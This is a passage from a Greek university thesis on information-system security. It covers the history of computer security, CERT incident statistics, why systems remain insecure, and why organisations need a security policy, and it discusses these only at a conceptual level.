θεωρούσε ότι η αυθεντικοποίηση των πακέτων από κάθε ενδιάμεσο σύστημα από το οποίο

διέρχονταν ήταν χάσιμο χρόνου και πως η φυσική ασφάλεια και οι έμπιστοι χρήστες του

συστήματος ήταν αρκετά για την ασφάλειά τους.

Επειδή όμως σύντομα έγινε εμφανές ότι η ασφάλεια των υπολογιστικών συστημάτων θα

αποτελούσε πρόβλημα χρηματοδοτούνται έρευνες και αναπτύσσονται οι πρώτοι αλγόριθμοι

κρυπτογράφησης όπως ο DES, η έννοια της κωδικοποίησης δημόσιου κλειδιού και ο RSA.

1985 – 1995

Οι προσωπικοί υπολογιστές (PCs) γίνονται δημοφιλή και εγκαθίστανται σχεδόν σε κάθε

γραφείο ενώ ταυτόχρονα κερδίζουν όλο και περισσότερους οικιακούς χρήστες. Η ανάγκη

διασύνδεσής τους γίνεται επιτακτική, κυρίως στον επιχειρηματικό κόσμο. Οι πρώτες

ηλεκτρονικές κοινότητες, γνωστές ως ηλεκτρονικοί πίνακες ανακοινώσεων κάνουν την

εμφάνισή τους ανάμεσα στους οικιακούς χρήστες και επιτρέπουν, μεταξύ άλλων, στους

εισβολείς να ανταλλάσουν πληροφορίες και να οργανώνονται σε συμμορίες. Οι στόχοι των

επιθέσεων τους είναι οι τηλεφωνικές εταιρείες, άλλοι πίνακες ανακοινώσεων και οι εταιρικοί

κεντρικοί υπολογιστές με λανθασμένη διαμόρφωση συνθηματικών.

Τα πανεπιστημιακά ιδρύματα αναλαμβάνουν να συνεχίσουν την έρευνα του στρατού για τη

δρομολόγηση πακέτων και αναπτύσσουν πρωτόκολλα δρομολόγησης. Αγνοούν και πάλι την

αυθεντικοποίηση των πακέτων από τα ενδιάμεσα συστήματα και η ασφάλεια τοποθετείται

στο επίπεδο της εφαρμογής που χρησιμοποιείται για τη δρομολόγηση πακέτων και όχι στο

επίπεδο δικτύου. Αυτό όμως δίνει τη δυνατότητα σε κάποιον που παρακολουθεί τους

ενδιάμεσους κόμβους δρομολόγησης πακέτων να συλλέξει κωδικούς πρόσβασης και να τους

χρησιμοποιήσει για να εισβάλει σε άλλα συστήματα.

Καθώς το World Wide Web και το e-mail γεννούνται προβάλλει επιτακτική η ανάγκη για

την ασφάλεια των πληροφοριακών συστημάτων, γι’ αυτό και αναπτύσσονται τα Αναχώματα

Ασφάλειας (Firewalls) τα οποία είναι ενδιάμεσα συστήματα που κάνουν πρόσθετη ανάλυση

των δεδομένων τα οποία ρέουν διαμέσου τους, για να καθορίσουν αν είναι έγκυρα και

πρέπει να δρομολογηθούν.

Page 25: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

25 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

1995 – 2005

Γύρω στο 1995 το Internet κερδίζει όλο και περισσότερους χρήστες και γίνεται τόσο

αναγκαίο που οι ιδιοκτήτες των ηλεκτρονικών πινάκων ανακοινώσεων σπεύδουν να

συνδέσουν τα συστήματά τους σε αυτό, ενώ ταυτόχρονα κάνουν την εμφάνισή τους οι

πάροχοι υπηρεσιών Internet (Internet Services Providers – ISP). Οι εταιρείες που

δραστηριοποιούνται στο χώρο των πληροφοριακών συστημάτων στρέφονται στην

προσαρμογή των προϊόντων τους «με δυνατότητες Internet». Όσες αγνοούν αυτό το νέο

δεδομένο εξαφανίζονται από την αγορά. Η Microsoft αντιλαμβάνεται γρήγορα τη δυναμική

του Internet και στην προσπάθειά της να δημιουργήσει προϊόντα τα οποία θα κατακτήσουν

την αγορά αξιοποιώντας την τεχνολογία Internet αδιαφορεί παντελώς για την ασφάλεια

τους. Τα εντελώς ανασφαλή πρωτόκολλα και το γεγονός ότι όλοι είναι συνδεμένοι στο ίδιο

ανασφαλές δίκτυο γίνεται ο παράδεισος των εισβολέων.

Η κυριαρχία της Micro soft στον κόσμο των PCs σήμαινε ότι οι εισβολείς μπορούσαν να

επικεντρώσουν τις προσπάθειές τους στην κατανόηση δύο μόνο λειτουργικών συστημάτων:

Unix, που είναι το εγγενές λειτουργικό σύστημα του Internet και Windows, που είναι το

λειτουργικό σύστημα για τα πλήθη. Δημιουργώντας δυνατότητες εισβολής σε αυτά τα δύο

λειτουργικά συστήματα μέσω του Internet, οι εισβολείς είχαν σχεδόν απεριόριστες

δυνατότητες προσπέλασης σε πληροφορίες. Οι προμηθευτές κατέβαλλαν προσπάθειες να

διορθώσουν τα προβλήματα ασφάλειας μόλις τα ανακάλυπταν, αλλά η υστέρηση μεταξύ του

χρόνου ανακάλυψης και του χρόνου απόκρισης ήταν μερικές εβδομάδες και κατά την

διάρκεια αυτών των εβδομάδων οι εισβολείς μπορούσαν να διαδώσουν τις ανακαλύψεις τους

και να προκαλέσουν εκτεταμένες καταστροφές.

Τα Αναχώματα Ασφάλειας (Firewalls) παρουσιάζονται σαν λύση στο πρόβλημα

προσπαθώντας να προστατευόσουν τα εσωτερικά συστήματα από εισβολείς. Αποτυγχάνουν

όμως, γιατί αφενός οι χρήστες μπορούν να τα παρακάμψουν, και αφετέρου γιατί αδυνατούν

να σταματήσουν τους εισβολείς από επιτρεπόμενες υπηρεσίες, όπως το e-mail και τις

υπηρεσίες web.

Μια άλλη, συμπληρωματική λύση που προτείνεται είναι η κρυπτογράφηση. Αρχίζουν να

δημιουργούνται πρωτόκολλα ασφάλειας τα οποία εστιάζουν από τη μία στην απόκρυψη

δεδομένων και την απόδειξη της ταυτότητας του ατόμου και από την άλλη στην διατήρηση

της ευκολίας χρήσης.

Page 26: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

26 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

2005 – Σήμερα

Η εξέλιξη της τεχνολογίας, κυρίως στις ασύρματες επικοινωνίες και στα δίκτυα κινητής

τηλεφωνίας, με τα ανασφαλή πρωτόκολλα υλοποίησής τους, η αύξηση της υπολογιστικής

ισχύς και το υ εύρους ζώνης των δικτύων, καθώς και η ο λο ένα αυξανό μενη ζήτηση

δικτυακών υπηρεσιών σε όλους τους τομείς της ζωής, σε συνδυασμό με τους «γερασμένους»

κρυπτογραφικούς αλγόριθμους, κάνουν το θέμα της ασφάλειας πιο επιτακτικό από ποτέ. Γι’

αυτό, σήμερα, δαπανώνται τεράστια ποσά σε έρευνα για θέματα ασφάλειας πληροφοριακών

συστημάτων και προστασίας κρίσιμων υποδομών. Ήδη έχει ξεκινήσει η διαδικασία για την

επιλογή του επόμενου κρυπτογραφικού αλγόριθμου ενώ παράλληλα η ασφάλεια

πληροφοριακών συστημάτων τείνει να γίνει αυτόνομος κλάδος της πληροφορικής.

Εικόνα 1.1: Ιστορική εξέλιξη της ασφάλειας υπολογιστών

Πηγή: Strebe Μ., 2004

Η επιτροπή Computer Emergency Response Team (CERT)4

4

του Πανεπιστημίου Carnegie Mellon,

άρχισε να παρακολουθεί και να καταγράφει τα προβλήματα ασφάλειας του Internet το 1988. Στον

http://www.cert.org/stats/cert_stats.html#mail-messages-processed

Page 27: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

27 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

πίνακα που ακολουθεί φαίνεται ότι τα επεισόδια ασφάλειας αυξάνονται με ρυθμό 50% ετησίως και αυτό

συμβαίνει από το1993, που είναι το πρώτο έτος για το οποίο υπάρχουν αξιόπιστες πληροφορίες για το

συνολικό μέγεθος του Internet. Μια μικρή πτώση στο ποσοστό εμφανίστηκε από το 2001, οπότε η

αύξηση τείνει να επιβραδύνεται λόγω της εξέλιξης των μηχανισμών ασφάλειας στα πληροφοριακά

συστήματα.

Πίνακας 1-1: Καταγεγραμμένα Επεισόδια ασφάλειας

Πηγή : http://www.cert.org/stats/cert_stats.html#mail-messages-processed

Στον πίνακα που ακολουθεί παρουσιάζονται οι καταγεγραμμένες ευπάθειες πληροφοριακών

συστημάτων από το 1995 και έπειτα. Από τη μελέτη των στοιχείων γίνεται φανερό ότι κάθε τεχνολογική

εξέλιξη προκαλεί και αντίστοιχη έκρηξη ευπαθειών, ενώ η τάση επιβραδύνεται με την ανάπτυξη

μηχανισμών ασφάλειας.

Page 28: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

28 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Πίνακας 1-2: Καταγεγραμμένες ευπάθειες πληροφοριακών συστημάτων Πηγή : http://www.cert.org/stats/cert_stats.html#mail-messages-processed

1.4 Γιατί τα πληροφορικά συστήματα δεν είναι ασφαλή5

Το εύλογο ερώτημα που τίθεται είναι: γιατί τα πληροφοριακά συστήματα δεν είναι ασφαλή;

Η απάντηση σε αυτό μπορεί να συνοψιστεί στα παρακάτω προβλήματα:

Η ασφάλεια είναι ενοχλητική: Από τη μια πλευρά, οι δημιουργοί λειτουργικών

συστημάτων αποφεύγουν την προσθήκη χαρακτηριστικών ασφάλειας σε αυτά γιατί έχει ως

συνέπεια τη δημιουργία προβλημάτων στους χρήστες. Οι χρήστες, από την άλλη,

παρακάμπτουν την ασφάλεια είτε διαλέγοντας εύκολα στη χρήση - και κατά συνέπεια

εύκολα να εικαστούν – συνθηματικά (π.χ. 1234), είτε δεν τα αλλάξουν ποτέ, είτε τα

αποκαλύπτουν σε συνεργάτες τους, είτε τα αναγράφουν σε εμφανή σημεία, είτε

χρησιμοποιούν κοινούς λογαριασμούς χρηστών.

Οι κατασκευαστές λογισμικού διανέμουν τα προϊόντα τους έχοντας προ-ρυθμίσει τα

χαρακτηριστικά που θα εγκατασταθούν, απενεργοποιώντας σχεδόν πάντα τα

χαρακτηριστικά ασφάλειας. Αυτό συμβαίνει για να αποφεύγονται τα προβλήματα στους

τελικούς απλούς χρήστες οι οποίοι δεν διαθέτουν τις ικανότητες και τις γνώσεις να

κατανοήσουν και να ρυθμίσουν σωστά τα χαρακτηριστικά ασφάλειας, γεγονός το οποίο

συνεπάγεται η συντριπτική πλειοψηφία των εγκαταστάσεων λογισμικού να διαθέτει σοβαρά

προβλήματα ασφάλειας.

Το γεγονός ότι η ισχυρή ασφάλεια δεν είναι φιλική στο χρήστη και απαιτεί εξειδικευμένες

γνώσεις από όλους όσους εμπλέκονται σε ένα πληροφοριακό σύστημα είναι ο πιο

συνηθισμένος λόγος για τον οποίο η ασφάλεια αποτυγχάνει.

Προώθηση ανασφαλών χαρακτηριστικών λογισμικού στην αγορά. Οι κατασκευαστές

λογισμικού επικεντρώνουν την προσπάθειά τους στην προσθήκη χαρακτηριστικών τα οποία

θα κάνουν τα προϊόντα τους περισσότερο εμπορικά, δίνοντας μικρή ή συνήθως καθόλου

σημασία στην ασφάλειά τους. Χαρακτηριστικό παράδειγμα αποτελεί η εταιρεία Microsoft η

οποία ενσωμάτωσε και διέθεσε δωρεάν μια γλώσσα δημιουργίας script μαζί με το ευρέως

χρησιμοποιούμενο Microsoft Office προϊόν της. Αυτό αποτέλεσε σημαντικό πρόβλημα

ασφάλειας, αφού ένα ιομορφικό λογισμικό μπορεί εύκολα να ενσωματωθεί σε μια εφαρμογή

5 Strebe M., σελ. 2-4, 2004

Page 29: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

29 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

του Microsoft Office με τη μορφή μακροεντολής και να βλάψει ένα υπολογιστικό σύστημα,

δεδομένου ότι οι μακροεντολές εκτελούνται με το άνοιγμα του αρχείου.

Οι κατασκευαστές που επενδύουν στην ασφάλεια μένουν εκτός ανταγωνισμού.

Σύμφωνα με τους νόμους της αγοράς, ένα νέο προϊόν καθιερώνεται στην κατηγορία του εάν

καταφέρει να είναι το πρώτο που θα φτάσει προς πώληση στον καταναλωτή. Οι

κατασκευαστές πληροφοριακών συστημάτων οι οποίοι επενδύουν στην ασφάλεια των

προϊόντων τους χάνουν αυτό το συγκριτικό πλεονέκτημα από άλλους κατασκευαστές οι

οποίοι δεν το κάνουν, δεδομένου ότι η ανάπτυξη ασφαλών πληροφοριακών συστημάτων

είναι μια χρονοβόρα διαδικασία. Συνεπώς τα λιγότερο ασφαλή προϊόντα φτάνουν πρώτα

στην αγορά και καθιερώνονται.

Οι υπολογιστές και το λογισμικό εξελίσσονται πολύ γρήγορα. Η τεχνολογία δικτύων και

οι υπολογιστές εξελίσσονται με μεγαλύτερους ρυθμούς από την πρόβλεψη πιθανόν

προβλημάτων σε αυτά από τους κατασκευαστές τους. Έτσι, πρωτόκολλα τα οποία ποτέ δεν

σχεδιάστηκαν να είναι ασφαλή, υιοθετούνται για σκοπούς τους οποίους ποτέ δεν προτίθετο

από τους δημιουργούς τους και γίνονται δημοφιλή στο ευρύ κοινό.

Οι προγραμματιστές δεν μπορούν να προβλέψουν με ακρίβεια τις ευπάθειες. Οι

προγραμματιστές σπάνια σκέφτονται ότι η κατάσταση των συναρτήσεών τους μπορεί να

αλλάξει εξωτερικά από κάποια τιμή, ενώ εκτελείται ο κώδικάς τους, οπότε ελέγχουν μόνο

για τιμές που στέλνουν αυτοί στις συναρτήσεις. Όταν ο κώδικας περάσει τους ελέγχους

αποσφαλμάτωσης, διανέμεται χωρίς να ελεγχθεί με διάφορα τυχαία δεδομένα (fuzzing).

Ακόμα και να προσπαθούσαν να προβλέψουν τα σφάλματα δεν θα μπορούσαν ποτέ να

φανταστούν όλες τις πιθανές επιθέσεις που τα εκατομμύρια εισβολέων θα προσπαθούσαν να

κάνουν.

Δεν υπάρχει μεγάλη ποικιλομορφία στην αγορά λογισμικού. Η κυριαρχία των

λειτουργικών συστημάτων Windows έχει μειώσει τους στόχους των εισβολέων στις μικρές

παραλλαγές αυτών των συστημάτων. Επομένως, οι εισβολείς αρκεί να εντοπίσουν τις

ευπάθειές τους για να έχουν πρόσβαση σε μεγάλο αριθμό πληροφοριακών συστημάτων.

Οι κατασκευαστές αποκρύπτουν τα προβλήματα των προϊόντων τους. Για να αποφύγουν

προβλήματα με τους πελάτες τους, οι κατασκευαστές προσπαθούν να κρύψουν τα

προβλήματα των λειτουργικών συστημάτων τους και έτσι αποθαρρύνουν την συζήτηση γι’

αυτά. Αντίθετα, οι εισβολείς κοινοποιούν τα προβλήματα που ανακαλύπτουν αμέσως σε όλο

Page 30: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

30 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

τον κόσμο, μέσω του Internet. Αυτή η διαφορά σημαίνει ότι τα προβλήματα διαχέονται πολύ

περισσότερο από τις λύσεις τους.

Οι διορθώσεις δεν κοινοποιούνται ευρέως και μπορούν να προκαλέσουν προβλήματα

όταν εγκαθίστανται. Όταν ανακαλύπτονται προβλήματα ασφάλειας σε κάποιο λογισμικό, ο

κατασκευαστής διορθώνει το πρόβλημα, δημοσιεύει τη διόρθωση στο Internet και στέλνει

μια ειδοποίηση μέσω e-mail στους εγγεγραμμένους πελάτες του. Αυτή η πρακτική έχει σαν

αποτέλεσμα να μην παίρνουν όλοι οι πελάτες του τη διόρθωση. Επιπλέον η εμπειρία έχει

δείξει ότι οι περισσότεροι χρήστες δεν εγκαθιστούν ποτέ διορθώσεις ασφάλειας για το

λογισμικό, εκτός αν δεχτούν κάποια επίθεση.

Εκτός αυτού όμως, οι κατασκευαστές συχνά στέλνουν βιαστικές διορθώσεις στους πελάτες

τους για πιθανά σφάλματα τα οποία δεν έχουν επακριβώς προσδιοριστεί, με αποτέλεσμα η

εγκατάστασή τους να δημιουργεί προβλήματα στην ομαλή λειτουργία του συστήματος.

1.5 Διαχείριση Ασφάλειας – Αναγκαιότητα Ύπαρξης Πολιτικής Ασφάλειας

Τα περιουσιακά στοιχεία του πληροφοριακού συστήματος τα οποία πρέπει να

προστατευθούν είναι το υλικό, το λογισμικό, ο εξοπλισμό επικοινωνιών και

περιβαλλοντικού ελέγχου, το απαραίτητο υλικό τεκμηρίωσης, καθώς και οι πληροφορίες τις

οποίες επεξεργάζεται, μεταδίδει και αποθηκεύει. Όσο καλά όμως και αν είναι σχεδιασμένα,

τα επιμέρους συστατικά του περιέχουν ευπάθειες. Τις ευπάθειες μπορούν να τις

εκμεταλλευτούν οι απειλές στις οποίες υπόκειται το σύστημα και να επιφέρουν επιπτώσεις

τόσο σε αυτό όσο και στον οργανισμό που τις χρησιμοποιεί. Οι επιπτώσεις είναι συναρτήσει

της αξίας των περιουσιακών στοιχείων που βλάπτονται.

Page 31: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

31 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 1.2: Αντιληπτικό Μοντέλο της Επικινδυνότητας

Πηγή: Γκρίτζαλης Δ., Ανάλυση και Διαχείριση Επικινδυνότητας ΠΣ, Πανεπιστημιακές Διαλέξεις, 2004

Ο οργανισμός ή η επιχείρηση αποσκοπεί στην ελαχιστοποίηση της πιθανότητας εμφάνισης

επιπτώσεων ή στην ελαχιστοποίηση των συνεπειών τους. Αυτός ο σκοπός επιτυγχάνεται με

τον καθορισμό μιας πολιτικής ασφάλειας η οποία αποτυπώνεται με την επιλογή και

εγκατάσταση αποτελεσματικών μέτρων προστασίας. Δεδομένου ότι τα μέτρα προστασίας

έχουν κόστος, η επιλογή τους γίνεται με κριτήριο το βαθμό προστασίας που παρέχουν σε

σχέση με τον αναμενόμενο κίνδυνο. Ο βαθμός κινδύνου καθορίζεται ως συνάρτηση της

πιθανότητας εμφάνισης μιας απειλής, του βαθμού ευπάθειας του συστήματος ως προς την

απειλή και της σοβαρότητας των συνεπειών που θα προκύψουν αν η απειλή εκμεταλλευτεί

επιτυχώς την ευπάθεια6

.

Η πολιτική ασφάλειας αποτελεί μια από τις βασικότερες πρακτικές για την διαχείριση της

ασφάλειας και η ανάπτυξη και εφαρμογή της θεωρείται απαραίτητη για τους οργανισμούς

που διαθέτουν πληροφοριακά συστήματα και περιλαμβάνει τις ακόλουθες διαδικασίες7

:

• Τον προσδιορισμό των κινδύνων που αντιμετωπίζουν τα πληροφοριακά συστήματα και

των αναγκαίων μέτρων για την προστασία τους από τους κινδύνους αυτούς.

• Τον καθορισμό μιας πολιτικής ασφάλειας για τα πληροφοριακά συστήματα και τον

προσδιορισμό των διαθέσιμων πόρων για την εφαρμογή της πολιτικής ασφάλειας.

• Τον καθορισμό των ρόλων, των αρμοδιοτήτων και την απόδοση υπευθυνοτήτων για τα

ζητήματα της ασφάλειας των πληροφοριακών συστημάτων.

• Την ενημέρωση και ευαισθητοποίηση των χρηστών σε ζητήματα ασφάλειας και την

εκπαίδευση και κατάρτισή τους στη χρήση και εφαρμογή των μέτρων προστασίας.

• Τον καθορισμό σχεδίων ανάνηψης και συνέχειας από την πραγματοποίηση περιστατικών

ασφάλειας.

• Την αξιολόγηση όλων των διαδικασιών διαχείρισης της ασφάλειας των πληροφοριακών

συστημάτων.

Οι αναγκαιότητα και η σκοπιμότητα της ύπαρξης πολιτικής ασφάλειας σε ένα οργανισμό

μπορεί να συνοψιστεί στα παρακάτω8

6 Κάτσικας Σ., Ασφάλεια Υπολογιστών, σελ. 67, Ελληνικό Ανοιχτό Πανεπιστήμιο, Πάτρα 2001.

:

7 Κάτσικας Σ. – Γκρίτζαλης Δ – Γκρίτζαλης Σ., σελ. 378-379, 2004. 8 Κάτσικας Σ. – Γκρίτζαλης Δ – Γκρίτζαλης Σ., σελ. 380-383, 2004.

Page 32: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

32 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Καθοδήγηση της επιλογής και υλοποίησης των μέτρων ασφάλειας: Συχνά, για την

αντιμετώπιση περιστατικών ασφάλειας του πληροφοριακού συστήματος, ένας

οργανισμός προβαίνει στην αγορά προϊόντων ασφάλειας (υλικού ή λογισμικού) για την

υιοθέτηση κάποιων μέτρων προστασίας των πληροφοριακών συστημάτων. Εάν

απουσιάζει η απαραίτητη οργανωτική υποδομή, τα μέτρα θα αποβούν αναποτελεσματικά.

Επιπλέον, η συνεπής υλοποίηση μιας πληθώρας διαφορετικών μέτρων ασφάλειας, από τα

οποία άλλα μπορεί να είναι τεχνικής φύσης και άλλα διοικητικής φύσης, απαιτεί

συντονισμό για να αποφευχθεί η περίπτωση επικαλύψεων και για να μην υπάρχουν

συγκρούσεις και ασυμβατότητες.

• Δημιουργία ‘καναλιού επικοινωνίας’ μεταξύ των εμπλεκομένων: Το έγγραφο της

πολιτικής ασφάλειας αποτελεί σημείο αναφοράς για την επικοινωνία και διαπραγμάτευση

μεταξύ των εμπλεκόμενων σε ένα πληροφοριακό σύστημα φορέων ενώ ταυτόχρονα

συμβάλει στη δημιουργία κοινής αντίληψης για την αναγκαιότητα της ασφάλειας.

• Εξασφάλιση και διαχείριση των απαραίτητων πόρων: Η ανάπτυξη μιας πολιτικής

ασφάλειας, συμβάλει στην αποδοτική διαχείριση της ασφάλειας των πληροφοριακών

συστημάτων ενός οργανισμού, αφού καθορίζει ποιοι είναι οι εμπλεκόμενοι φορείς και

ποια τα συμφέροντά τους, προγραμματίζει τις ενέργειες που απαιτούνται και δεσμεύει

τους απαραίτητους πόρους.

• Εδραίωση της σημασίας της ασφάλειας των Πληροφοριακών Συστημάτων για τον

οργανισμό: Η αποτύπωση των στόχων της διοίκησης για την ασφάλεια των

πληροφοριακών συστημάτων, στην πολιτική ασφάλειας, θεμελιώνει τη σπουδαιότητά της

και διασφαλίζει ότι οι χρήστες θα συμβάλλουν στην εφαρμογή των μέτρων προστασίας.

• Καλλιέργεια ‘κουλτούρας ασφάλειας’: Με την εφαρμογή της πολιτικής ασφάλειας οι

χρήστες των πληροφοριακών συστημάτων αναπτύσσουν κοινή αντίληψη και γνώση της

αναγκαιότητας προστασίας και των στόχων ασφάλειας, δημιουργούνται κοινές πρακτικές

τρόπων προστασίας των πληροφοριακών συστημάτων και γενικότερα καλλιεργούν μια

κουλτούρα ασφάλειας. Αυτό είναι ιδιαίτερα σημαντικό καθώς η τεχνολογική εξέλιξη

αυξάνει τους κινδύνους που απειλούν το πληροφοριακό σύστημα και με δεδομένο ότι το

έγγραφο της πολιτικής ασφάλειας δεν μπορεί να περιγράψει μελλοντικούς κινδύνους και

μέτρα προστασίας από αυτούς, η κουλτούρα ασφάλειας μπορεί να συμβάλλει ουσιαστικά

στην προστασία του πληροφοριακού συστήματος.

• Ικανοποίηση νομικών υποχρεώσεων του οργανισμού: Το νομικό και κανονιστικό

πλαίσιο που διέπει τη λειτουργία ενός πληροφοριακού συστήματος επιβάλλει την

εφαρμογή πολιτικής ασφάλειας.

• Υποστήριξη Επιχειρηματικών Αναγκών: Οι σύγχρονοι οργανισμοί σε πολλές

περιπτώσεις εξαρτούν τη λειτουργία τους από την ύπαρξη ενός πληροφοριακού

Page 33: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

33 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

συστήματος το οποίο, για να επιτευχθεί ο επιχειρηματικός σκοπός, θα πρέπει να είναι

ασφαλές. Επιπλέον, η εφαρμογή μιας πολιτικής ασφάλειας συμβάλει στην ανάπτυξη

σχέσεων εμπιστοσύνης με τους πελάτες και τους επιχειρηματικούς εταίρους του

οργανισμού με αποτέλεσμα την υποστήριξη των επιχειρηματικών δραστηριοτήτων.

Η κατάρτιση μιας πολιτικής ασφάλειας δεν είναι αρκετή από μόνη της να συμβάλει

αποτελεσματικά στην προστασία ενός πληροφοριακού συστήματος. Πρέπει να εφαρμοστεί

και αποτελεσματικά. Οι παράγοντες που συμβάλλουν στην επιτυχημένη εφαρμογή της

είναι9

• Ευθυγράμμιση με τους επιχειρησιακούς στόχους: Οι στόχοι και οι δράσεις που

περιλαμβάνονται στην πολιτική ασφάλειας θα πρέπει να αντικατοπτρίζουν και τους

γενικότερους στόχους του οργανισμού. Συχνά, οι απαιτήσεις για την ασφάλεια ενός

πληροφοριακού συστήματος μπορεί να μην είναι συμβατές, ή ακόμα και να

συγκρούονται, με τους γενικότερους επιχειρηματικούς στόχους (για παράδειγμα, η

ανάγκη για προστασία της εμπιστευτικότητας των πληροφοριών μπορεί να απαιτεί των

περιορισμό της πρόσβασης των χρηστών στις πληρο φορίες, ενώ η ανάγκη το υ

οργανισμού για ευελιξία και ταχύτητα στην διεκπεραίωση των λειτουργιών του να

απαιτεί απρόσκοπτη πρόσβαση όλων των χρηστών στις πληροφορίες). Θα πρέπει

επομένως να διασφαλίζεται ότι η πολιτική ασφάλειας κινείται προς την ίδια κατεύθυνση

με τους επιχειρησιακούς στόχους. Ακόμα, είναι επιθυμητό η πολιτική ασφάλειας να

συμβάλλει στην επίτευξη των επιχειρηματικών στόχων. Η κατανόηση επομένως των

επιχειρηματικών στόχων κάθε οργανισμού έχει μεγάλη σημασία για την δημιουργία μιας

αποτελεσματικής πολιτικής ασφάλειας. Τόσο η πολιτική ασφάλειας, όσο και τα μέτρα

και οι οδηγίες που τη συνοδεύουν, θα πρέπει να υποστηρίζουν τους στόχους αυτούς,

διαφορετικά είναι πολύ πιθανό να αγνοηθούν από τους χρήστες και να παραμείνουν

ανενεργά. Η διαμόρφωση της πολιτικής ασφάλειας των πληροφοριακών συστημάτων και

η εφαρμογή των μέτρων προστασίας που απορρέουν από την πολιτική αυτή, πρέπει να

έχουν ως γνώμονα την ωφέλεια του οργανισμού.

:

• Υποστήριξη από τη διοίκηση του οργανισμού: Είναι σημαντικό η διοίκηση του

οργανισμού να εμπλακεί ενεργά και το δυνατόν νωρίτερα στην διαδικασία διαμόρφωσης

